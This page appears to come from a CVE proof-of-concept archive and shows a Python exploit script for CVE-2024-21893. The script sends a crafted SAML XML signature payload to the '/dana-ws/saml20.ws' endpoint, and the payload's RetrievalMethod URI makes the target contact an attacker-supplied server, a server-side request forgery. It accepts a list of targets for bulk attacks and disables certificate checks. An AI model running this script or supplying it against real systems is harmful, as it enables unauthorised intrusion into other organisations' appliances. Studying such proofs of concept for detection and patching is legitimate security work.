4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-21893
README.md
Rendering markdown...
POC / CVE-2024-21893.py PY
⬇ Raw GitHub ✕ Close 
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import argparse
from urllib.parse import urlparse

def ensure_http(url):
    if not url.startswith("http://") and not url.startswith("https://"):
        return f"https://{url}"
    return url

def send_poc(target_url, attacker_server):
    payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
                <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
            </ds:SignedInfo>
            <ds:SignatureValue>qwerty</ds:SignatureValue>
            <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
                <ds:RetrievalMethod URI="{attacker_server}"/>
                <ds:X509Data/>
            </ds:KeyInfo>
            <ds:Object></ds:Object>
        </ds:Signature>
    </soap:Body>
</soap:Envelope>"""

    target_url = ensure_http(target_url)
    payload = payload_template.format(attacker_server=attacker_server)

    parsed_url = urlparse(target_url)
    full_path = parsed_url.path if parsed_url.path else "/dana-ws/saml20.ws"
    host = parsed_url.netloc

    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "curl/8.4.0",
        "Accept": "*/*",
        "Connection": "close",
        "Content-Length": str(len(payload))
    }

    response = requests.post(f"{parsed_url.scheme}://{host}{full_path}", data=payload, headers=headers, verify=False)

    print(f"Sending PoC to {target_url}...")

def main():
    parser = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
    parser.add_argument('-u', '--url', type=str, help='Single target URL')
    parser.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
    parser.add_argument('-a', type=str, required=True, help='Attacker server URL')
    args = parser.parse_args()

    if args.url:
        send_poc(args.url, args.a)
    elif args.list:
        with open(args.list, 'r') as file:
            for line in file:
                target = line.strip()
                if target:
                    send_poc(target, args.a)
    else:
        print("No target specified. Use -u for a single target or -l for a list of targets.")

if __name__ == "__main__":
    main()